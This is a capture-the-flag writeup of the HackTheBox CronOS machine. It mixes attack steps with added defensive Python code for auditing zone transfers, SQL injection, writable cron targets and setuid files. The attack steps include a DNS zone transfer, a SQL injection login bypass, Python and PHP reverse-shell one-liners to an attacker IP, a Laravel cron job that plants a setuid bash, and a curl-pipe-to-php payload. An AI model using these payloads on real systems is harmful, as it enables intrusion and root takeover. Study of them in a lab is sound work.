OSCP Notes

HTB CronOS Writeup

nmap:
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

  • Default server page found for apache2
Try doing a reverse lookup with nslookup: run nslookup, type server IP to point it at the target's own DNS server, then look up the IP.
Now that we see it is hosting cronos.htb, let's try a zone transfer to discover any other subdomains:
dig AXFR cronos.htb @IP
Gobuster didn't have any luck.
Save the found subdomains to /etc/hosts.
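The zone transfer works because the BIND server hands the whole zone to any client that asks. The check a defender wants is the allow-transfer policy in named.conf, per zone and in the global options block. The following is an added example (not part of the original writeup, and not taken from the box): a small Python audit over a constructed named.conf fragment that reports every zone whose effective policy is "any", including zones that set nothing and fall back to the global setting or to BIND's own default, which in releases such as the 9.10 seen in the scan is to allow transfers to everyone. The parser assumes the conventional layout where each block's closing "};" starts a line.

```python
import re

# Constructed named.conf fragment (assumed layout; not from the box).
SAMPLE_NAMED_CONF = """\
options {
    directory "/var/cache/bind";
    allow-transfer { any; };
};

zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";
};

zone "internal.example" {
    type master;
    file "/etc/bind/db.internal";
    allow-transfer { 10.0.0.2; };
};

zone "secondary.example" {
    type master;
    file "/etc/bind/db.secondary";
    allow-transfer { none; };
};
"""

# Top-level `options { ... };` and `zone "name" { ... };` blocks whose closing
# brace sits at the start of a line (simplified parser for that layout).
BLOCK_RE = re.compile(r'^(options|zone\s+"([^"]+)")\s*\{(.*?)^\};', re.S | re.M)
TRANSFER_RE = re.compile(r'allow-transfer\s*\{([^}]*)\}')


def parse_transfer_policy(conf):
    """Return (global_policy, {zone: policy}); a policy is the ACL text inside
    allow-transfer ('any', 'none', an address list) or None when not set."""
    global_policy, zones = None, {}
    for m in BLOCK_RE.finditer(conf):
        t = TRANSFER_RE.search(m.group(3))
        policy = t.group(1).strip().rstrip(';').strip() if t else None
        if m.group(1) == 'options':
            global_policy = policy
        else:
            zones[m.group(2)] = policy
    return global_policy, zones


def find_open_zones(conf):
    """Zones whose effective allow-transfer permits any client: an explicit
    'any', or nothing set so the global policy applies, where an absent
    global policy means BIND's own 'any' default."""
    global_policy, zones = parse_transfer_policy(conf)
    open_zones = []
    for name, policy in zones.items():
        effective = policy if policy is not None else global_policy
        if effective is None or effective == 'any':
            open_zones.append(name)
    return sorted(open_zones)


if __name__ == '__main__':
    for zone in find_open_zones(SAMPLE_NAMED_CONF):
        print('AXFR open to anyone: ' + zone)
```

Run against the sample, only cronos.htb is reported: it sets no policy of its own and inherits the global "any". The fix is the same in both places: allow-transfer { none; }; globally, and a list of the real secondary addresses on the zones that need it, as internal.example does above.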
Found the admin page.
Try SQL injection:
save the POST request as login.req and run
sqlmap -r login.req
Redirecting was happening.
Tried using '-- - in the user field and it worked! (Intercept the traffic in Burp Suite and URL-encode it.)
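What makes '-- - work is the login query being built by string concatenation: the quote closes the username literal and the comment marker removes the password check from the statement. The block below is an added example (my code, not the box's PHP or anything from the writeup) that puts the vulnerable pattern beside the parameterised fix, using an in-memory SQLite table with a constructed account so it runs offline. The admin/S3cr3t! credentials are constructed for the demo.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account (plaintext password
    only to keep the demo short; real code stores a password hash)."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, password TEXT)')
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
    return conn


def login_vulnerable(conn, username, password):
    """The pattern behind the bypass: user input spliced into the SQL text.
    With username  admin'-- -  the statement the database sees is
        SELECT username FROM users WHERE username = 'admin'-- -' AND ...
    and everything after -- is a comment, so the password is never checked."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, username, password):
    """Parameterised query: the driver binds the values, so quote and comment
    characters stay inside the bound string and never reach the SQL parser."""
    query = 'SELECT username FROM users WHERE username = ? AND password = ?'
    return conn.execute(query, (username, password)).fetchone() is not None


def run_demo():
    """Same payload against both versions; only the concatenated one is bypassed."""
    conn = make_db()
    payload = "admin'-- -"
    return {
        'vulnerable_bypassed': login_vulnerable(conn, payload, 'wrong'),
        'fixed_bypassed': login_fixed(conn, payload, 'wrong'),
        'fixed_real_login': login_fixed(conn, 'admin', 'S3cr3t!'),
    }


if __name__ == '__main__':
    for name, result in run_demo().items():
        print('%s: %s' % (name, result))
```

The trailing " -" in the payload is there because MySQL-family servers only treat "--" as a comment when it is followed by whitespace, and web frameworks often trim the end of form fields; the extra character keeps the space alive. In the fixed version the same input is just a strange username that matches nothing. On the detection side, a login endpoint that returns 302 redirects for inputs containing quote-and-comment sequences is exactly the pattern sqlmap was reacting to above, and it is cheap to alert on in web server logs.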
Now we can execute any commands!
Adjusting the command section in Burp Suite, I was able to execute a command.
Let's try a one-liner to get a reverse shell.
Tried:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.131",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Make sure to URL-encode it. Got the reverse shell!
Called the shell with python -c 'import pty; pty.spawn("/bin/sh")'

PrivEsc

  • Host linpeas.sh and run it.
Found a suspicious cronjob:
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
The tasks that schedule:run executes are defined in Laravel's scheduler kernel:
"app/Console/Kernel.php"
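The weakness here is not the cron job itself but who can change the code it runs: a root cron entry executing artisan, which in turn loads app/Console/Kernel.php from a tree the web user can write to. The following is an added example (not from the writeup or the box) of the audit a defender would run: it parses a crontab in /etc/crontab layout, pulls the absolute paths out of each command and flags any file or parent directory that is group- or world-writable, then separately walks an application tree for writable files, which is the only way to catch an include such as Kernel.php that never appears on the cron line. The crontab text, directory layout and permission modes are all constructed inside the block in a temporary directory.

```python
import os
import re
import stat
import tempfile

# /etc/crontab format: five schedule fields (or an @alias), the user, then the command.
CRON_LINE_RE = re.compile(
    r'^(?P<sched>(?:\S+\s+){5}|@\w+\s+)(?P<user>\S+)\s+(?P<cmd>.+)$')
# Absolute paths appearing anywhere in the command string.
PATH_RE = re.compile(r'(?<![\w./-])(/[\w./-]+)')
WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def parse_crontab(text):
    """Return [(user, command)] for the active jobs in a system crontab."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' in line.split()[0]:
            continue  # blank, comment, or a SHELL=/PATH= style variable
        m = CRON_LINE_RE.match(line)
        if m:
            jobs.append((m.group('user'), m.group('cmd').strip()))
    return jobs


def weak_targets(crontab_text):
    """Paths referenced by cron jobs whose file or parent directory is group-
    or world-writable: whoever has that access controls what the job's user
    (here root) executes."""
    findings, seen = [], set()
    for user, cmd in parse_crontab(crontab_text):
        for path in PATH_RE.findall(cmd):
            if path.startswith(('/dev/', '/proc/', '/sys/')):
                continue  # device and pseudo files, not code
            checks = ((path, 'file', stat.S_ISREG),
                      (os.path.dirname(path), 'directory', stat.S_ISDIR))
            for candidate, label, is_type in checks:
                try:
                    mode = os.stat(candidate).st_mode
                except OSError:
                    continue
                if is_type(mode) and mode & WRITE_BY_OTHERS and (user, candidate) not in seen:
                    seen.add((user, candidate))
                    findings.append((user, candidate, label + ' is group/world-writable'))
    return findings


def writable_tree(root):
    """Regular files under `root` that a non-owner can modify; run it on the
    application tree a root job loads code from, since the cron line alone
    never shows an included file like app/Console/Kernel.php."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and st.st_mode & WRITE_BY_OTHERS:
                hits.append(full)
    return sorted(hits)


def build_demo():
    """Constructed layout mimicking the box: a root cron job runs artisan from
    an application directory where the web user can edit files."""
    base = tempfile.mkdtemp(prefix='cronaudit_')
    app = os.path.join(base, 'laravel')
    console = os.path.join(app, 'app', 'Console')
    os.makedirs(console)
    for d in (app, os.path.join(app, 'app'), console):
        os.chmod(d, 0o755)
    artisan = os.path.join(app, 'artisan')
    kernel = os.path.join(console, 'Kernel.php')
    backup = os.path.join(base, 'backup.sh')
    # artisan group-writable, Kernel.php world-writable, backup.sh owner-only
    for path, mode in ((artisan, 0o664), (kernel, 0o666), (backup, 0o755)):
        with open(path, 'w') as fh:
            fh.write('# constructed placeholder\n')
        os.chmod(path, mode)
    crontab = (
        'SHELL=/bin/sh\n'
        'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n'
        '# m h dom mon dow user  command\n'
        '* * * * * root php %s schedule:run >> /dev/null 2>&1\n'
        '17 * * * * root %s\n' % (artisan, backup))
    return crontab, app


def demo():
    """Run both checks over the constructed layout."""
    crontab, app = build_demo()
    return weak_targets(crontab), writable_tree(app)


if __name__ == '__main__':
    cron_hits, tree_hits = demo()
    for user, path, why in cron_hits:
        print('cron job of %s: %s (%s)' % (user, path, why))
    for path in tree_hits:
        print('writable by others: ' + path)
```

The cron-line check reports only artisan; Kernel.php is found by the tree walk, which is the point of running both. The permission-bit rule is deliberately simple; on a real host the same audit should also flag a root job whose script, or any directory on its path, is owned by a service account, since ownership gives that account write access without any group or world bits.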
How to set up a scheduled task that runs terminal commands:
protected function schedule(Schedule $schedule)
{
    // run the command every minute and write its output to a file
    $schedule->exec('cd ~/Code/lpg && ls')
        ->everyMinute()
        ->sendOutputTo('/home/vagrant/Code/lpg/listing.txt');
}
Locate the file on the box:
find / -name Kernel.php 2>/dev/null
First attempt, adding the php -r reverse shell as a scheduled task:
$schedule->exec('php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");')->everyMinute();
php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
I located the file in the HTML and downloaded it by visiting the site.
Used this guy's method:
let’s just make a temporary copy of bash (as root) and give it the SUID bit.
We add the following code to Kernel.php
protected function schedule(Schedule $schedule)
{
    // copy bash to /tmp and set the SUID bit; cron runs this as root
    $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
    $schedule->exec($cmd)->everyMinute();
}
…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.
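The artefact this method leaves behind, a root-owned copy of bash with the setuid bit in /tmp, is easy to detect, and a periodic scan for it is a reasonable compensating control on hosts where cron jobs run as root. The block below is an added example (not from the writeup) of such a scan: the classification rule is a pure function of path, mode and owner so it can be exercised with constructed values, and scan() applies it across the filesystem. The list of expected setuid locations is an assumed Debian/Ubuntu baseline, not anything the page states.

```python
import os
import stat

# Directories where root setuid binaries normally live on a Debian/Ubuntu
# system (assumed baseline; adjust per distribution).
EXPECTED_DIRS = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/usr/libexec/')
# Directories any local user can write to: a root setuid file here is never legitimate.
PUBLIC_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')
# Shells and interpreters that must never carry the setuid bit.
SHELL_NAMES = frozenset({'sh', 'bash', 'dash', 'zsh', 'ksh', 'python', 'perl', 'php'})


def classify_suid(path, mode, uid):
    """Return a reason string if a root setuid file looks suspicious, else None.
    `mode` and `uid` are st_mode and st_uid, passed in so the rules can be
    tested without creating real setuid files."""
    if not (mode & stat.S_ISUID) or uid != 0:
        return None
    name = os.path.basename(path)
    if path.startswith(PUBLIC_DIRS):
        return 'root setuid file in a world-writable directory'
    # 'python3.8' -> 'python'; a renamed copy (sbash) is caught by the location rules
    if name in SHELL_NAMES or name.rstrip('0123456789.') in SHELL_NAMES:
        return 'root setuid copy of a shell or interpreter'
    if not path.startswith(EXPECTED_DIRS):
        return 'root setuid file outside the system binary directories'
    return None


def scan(roots=('/',)):
    """Walk `roots` and report (path, reason) for suspicious root setuid files."""
    findings = []
    skip = {'/proc', '/sys', '/dev'}
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root):
            # do not descend into pseudo filesystems
            dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
            for name in filenames:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                reason = classify_suid(full, st.st_mode, st.st_uid)
                if reason:
                    findings.append((full, reason))
    return findings


if __name__ == '__main__':
    for path, reason in scan():
        print('%s: %s' % (path, reason))
```

Name matching is the weakest of the three rules, since the copy can be called anything; the location rules carry the weight, and a setuid file in /tmp is a finding on its own. The method's "-p" flag is also worth knowing from the detection side: bash resets its effective uid to the real uid at startup unless started with -p, so a setuid bash copy is only useful to an attacker when invoked that way, which is a distinctive command line to look for in process auditing.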
Another method would be to edit the artisan file and let the system download a reverse shell from our host and execute it:
<?php system('curl http://10.10.14.57/reverse.php | php') ?>